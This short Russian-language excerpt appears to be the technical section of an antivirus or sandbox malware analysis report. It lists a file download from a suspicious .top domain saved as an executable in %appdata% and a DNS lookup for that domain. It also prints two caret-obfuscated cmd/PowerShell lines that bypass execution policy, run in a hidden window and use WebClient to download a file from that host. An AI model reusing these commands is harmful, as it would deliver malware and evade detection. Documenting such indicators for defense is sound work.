Техническая информация
- http://poooperfath.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowERsHEl^l.e^xE ^-eXeC^u^Ti^o^npO^LIc^Y^ ^B^Y^P^aSS^ -nopRof^i^LE ^-WInDoWStY^L^E h^IDDE^n (^NE^w^-OB^je^Ct ^Sy^stE^m.^net.^w^EBcL^i^ENt^)^.d^oWNLoa^D^f^iLe^(^'http://poooperfat...
- DNS ASK po###erfath.top
- '<SYSTEM32>\cmd.exe' /c "PowERsHEl^l.e^xE ^-eXeC^u^Ti^o^npO^LIc^Y^ ^B^Y^P^aSS^ -nopRof^i^LE ^-WInDoWStY^L^E h^IDDE^n (^NE^w^-OB^je^Ct ^Sy^stE^m.^net.^w^EBcL^i^ENt^)^.d^oWNLoa^D^f^iLe^(^'http://poooperfat...' (со скрытым окном)